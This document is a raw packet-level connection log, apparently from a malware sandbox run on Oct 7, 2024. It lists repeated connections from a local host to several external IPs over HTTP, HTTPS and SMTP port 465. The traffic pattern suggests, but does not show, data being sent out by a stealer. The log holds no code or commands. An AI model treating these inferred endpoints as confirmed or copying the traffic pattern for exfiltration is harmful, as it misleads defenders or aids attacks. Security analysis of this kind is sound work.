Oct 7, 2024 22:41:18.590619087 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.590641975 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.714765072 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.714982033 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.716681957 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.716689110 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.717407942 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.718946934 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.722716093 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.722825050 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.722867012 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.723161936 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.727137089 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.731988907 CEST	80	49734	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:18.732072115 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.732151031 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.736900091 CEST	80	49734	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:18.759424925 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.835882902 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.836116076 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:18.836182117 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.836550951 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:18.840990067 CEST	49731	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.841902971 CEST	49735	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.846568108 CEST	80	49731	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:18.846638918 CEST	49731	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.846700907 CEST	80	49735	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:18.846755981 CEST	49735	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.846898079 CEST	49735	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:18.852226973 CEST	80	49735	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:20.117151022 CEST	80	49734	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:20.117259026 CEST	80	49734	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:20.117367983 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:20.118988991 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.119029999 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:20.119122028 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.119420052 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.119435072 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:20.522958040 CEST	80	49734	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:20.523011923 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:20.654438019 CEST	80	49735	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:20.655627012 CEST	49737	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.655670881 CEST	443	49737	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:20.655736923 CEST	49737	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.655972958 CEST	49737	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.655992985 CEST	443	49737	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:20.697622061 CEST	49735	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:20.974324942 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:20.976344109 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:20.976367950 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.102107048 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.102240086 CEST	443	49736	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.102294922 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:21.102952003 CEST	49736	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:21.107796907 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.109102011 CEST	49739	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.113903046 CEST	80	49734	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:21.113954067 CEST	49734	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.113965034 CEST	80	49739	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:21.114031076 CEST	49739	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.114135981 CEST	49739	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.118751049 CEST	443	49737	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.118954897 CEST	80	49739	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:21.121383905 CEST	49737	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:21.121417046 CEST	443	49737	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.235419035 CEST	443	49737	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.235660076 CEST	443	49737	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:21.235727072 CEST	49737	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:21.236120939 CEST	49737	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:21.241432905 CEST	49740	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.246362925 CEST	80	49740	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:21.246436119 CEST	49740	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.246566057 CEST	49740	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:21.251672029 CEST	80	49740	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:22.369800091 CEST	80	49739	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:22.371519089 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:22.371572018 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:22.371634007 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:22.372013092 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:22.372034073 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:22.417398930 CEST	49739	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:22.857196093 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:22.859730005 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:22.859764099 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.011495113 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.011605024 CEST	443	49744	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.011655092 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.012181044 CEST	49744	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.033797979 CEST	49739	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.042431116 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.042464972 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.042526007 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.043051958 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.043067932 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.046955109 CEST	80	49739	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:23.047010899 CEST	49739	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.221664906 CEST	80	49740	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:23.223258972 CEST	49747	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.223356962 CEST	443	49747	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.223443985 CEST	49747	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.223752975 CEST	49747	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.223786116 CEST	443	49747	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.275891066 CEST	49740	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.679923058 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.679990053 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.684540987 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.684545994 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.684941053 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.692256927 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.707443953 CEST	443	49747	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.723886967 CEST	49747	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.723916054 CEST	443	49747	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.735408068 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.859005928 CEST	443	49747	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.859164953 CEST	443	49747	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:23.859359026 CEST	49747	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.859906912 CEST	49747	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:23.863214970 CEST	49740	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.864661932 CEST	49748	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.869501114 CEST	80	49748	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:23.869647026 CEST	49748	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.870141029 CEST	49748	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.870537996 CEST	80	49740	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:23.870598078 CEST	49740	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:23.875349998 CEST	80	49748	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:23.976557970 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.976640940 CEST	443	49746	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:23.976809025 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:23.981093884 CEST	49746	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:24.681845903 CEST	80	49748	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:24.731408119 CEST	49748	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:24.751416922 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:24.751468897 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:24.751605034 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:24.763407946 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:24.763443947 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:25.222700119 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:25.224745035 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:25.224781990 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:25.388221979 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:25.388448000 CEST	443	49749	188.114.97.3	192.168.2.8
Oct 7, 2024 22:41:25.388534069 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:25.388961077 CEST	49749	443	192.168.2.8	188.114.97.3
Oct 7, 2024 22:41:25.397752047 CEST	49748	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:25.398684978 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:25.398714066 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:25.398848057 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:25.399265051 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:25.399277925 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:25.405335903 CEST	80	49748	132.226.8.169	192.168.2.8
Oct 7, 2024 22:41:25.405392885 CEST	49748	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:26.007349968 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:26.007436991 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:26.009238005 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:26.009243965 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:26.009469032 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:26.011037111 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:26.051410913 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:26.260384083 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:26.260549068 CEST	443	49750	149.154.167.220	192.168.2.8
Oct 7, 2024 22:41:26.260601044 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:26.261337996 CEST	49750	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:41:29.188304901 CEST	49729	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:29.385112047 CEST	49751	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:41:29.390212059 CEST	465	49751	172.65.255.143	192.168.2.8
Oct 7, 2024 22:41:29.390333891 CEST	49751	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:41:31.406876087 CEST	49727	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:31.407069921 CEST	49735	80	192.168.2.8	132.226.8.169
Oct 7, 2024 22:41:31.540350914 CEST	49752	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:41:31.545883894 CEST	465	49752	172.65.255.143	192.168.2.8
Oct 7, 2024 22:41:31.545998096 CEST	49752	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:37.667414904 CEST	49751	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:37.673449993 CEST	465	49751	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:37.673520088 CEST	49751	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:37.684097052 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:37.684135914 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:37.684206009 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:37.684752941 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:37.684767962 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:38.297508001 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:38.308089018 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:38.308098078 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:38.308187962 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:38.308192015 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:38.593605995 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:38.594043970 CEST	443	52177	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:38.594114065 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:38.599622011 CEST	52177	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:40.118103981 CEST	52178	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:40.123079062 CEST	465	52178	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:40.123218060 CEST	52178	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:41.042081118 CEST	49752	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:41.047180891 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:41.047233105 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:41.047419071 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:41.048291922 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:41.048309088 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:41.175070047 CEST	465	49752	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:41.175203085 CEST	49752	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:41.755583048 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:41.785608053 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:41.785636902 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:41.785763979 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:41.785770893 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:42.072237015 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:42.072316885 CEST	443	52179	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:42.072361946 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:42.073214054 CEST	52179	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:43.593710899 CEST	52180	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:43.600174904 CEST	465	52180	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:43.600244999 CEST	52180	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:45.042061090 CEST	52178	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:45.045238018 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:45.045265913 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:45.047447920 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:45.048021078 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:45.048033953 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:45.048736095 CEST	465	52178	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:45.049063921 CEST	52178	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:45.664844990 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:45.667546988 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:45.667576075 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:45.667757034 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:45.667764902 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:46.022011995 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:46.022747040 CEST	443	52181	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:46.022836924 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:46.023570061 CEST	52181	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:47.531734943 CEST	52182	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:47.539803982 CEST	465	52182	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:47.539907932 CEST	52182	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:53.433254004 CEST	52182	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:53.435626984 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:53.435700893 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:53.435883045 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:53.439479113 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:53.439498901 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:53.439578056 CEST	465	52182	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:53.445352077 CEST	52182	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:54.238429070 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:54.245651007 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:54.245676994 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:54.245817900 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:54.245825052 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:54.507178068 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:54.507427931 CEST	443	52183	149.154.167.220	192.168.2.8
Oct 7, 2024 22:42:54.507489920 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:54.508045912 CEST	52183	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:42:56.015306950 CEST	52184	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:42:56.020997047 CEST	465	52184	172.65.255.143	192.168.2.8
Oct 7, 2024 22:42:56.021097898 CEST	52184	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:04.104676962 CEST	52180	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:04.110466003 CEST	465	52180	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:04.110522985 CEST	52180	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:04.117742062 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.117844105 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:04.117923021 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.118300915 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.118338108 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:04.841336966 CEST	52184	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:04.845335007 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.845427990 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:04.845870972 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.849329948 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.849360943 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:04.855194092 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:04.855295897 CEST	465	52184	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:04.855464935 CEST	52184	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:04.857340097 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.857361078 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:04.863369942 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:04.863424063 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.086677074 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.086786985 CEST	443	52185	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.087486982 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:05.087486982 CEST	52185	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:05.459233999 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.463949919 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:05.463996887 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.465370893 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:05.465383053 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.704797029 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.704906940 CEST	443	52186	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:05.704993963 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:05.705610037 CEST	52186	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:06.592012882 CEST	52187	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:06.796233892 CEST	465	52187	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:06.804351091 CEST	52187	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:13.663305998 CEST	52188	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:13.668629885 CEST	465	52188	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:13.668705940 CEST	52188	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:18.575407028 CEST	52188	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:18.581404924 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:18.581454039 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:18.582786083 CEST	465	52188	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:18.584496021 CEST	52188	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:18.584501982 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:18.587413073 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:18.587433100 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:19.519651890 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:19.525414944 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:19.525440931 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:19.533442020 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:19.533447981 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:19.948008060 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:19.948221922 CEST	443	52189	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:19.948288918 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:19.962433100 CEST	52189	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:19.967375994 CEST	52190	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:19.972301960 CEST	465	52190	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:19.972393036 CEST	52190	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:21.277416945 CEST	52190	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:21.279617071 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:21.279717922 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:21.280086040 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:21.280086040 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:21.280169964 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:21.283063889 CEST	465	52190	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:21.285502911 CEST	52190	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:21.891529083 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:21.894196987 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:21.894246101 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:21.894309998 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:21.894332886 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:22.188500881 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:22.188977003 CEST	443	52191	149.154.167.220	192.168.2.8
Oct 7, 2024 22:43:22.189047098 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:22.189711094 CEST	52191	443	192.168.2.8	149.154.167.220
Oct 7, 2024 22:43:22.192400932 CEST	52192	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:22.197433949 CEST	465	52192	172.65.255.143	192.168.2.8
Oct 7, 2024 22:43:22.197505951 CEST	52192	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:36.917480946 CEST	52192	465	192.168.2.8	172.65.255.143
Oct 7, 2024 22:43:36.922939062 CEST	465	52192	172.65.255.143	192.168.2.8
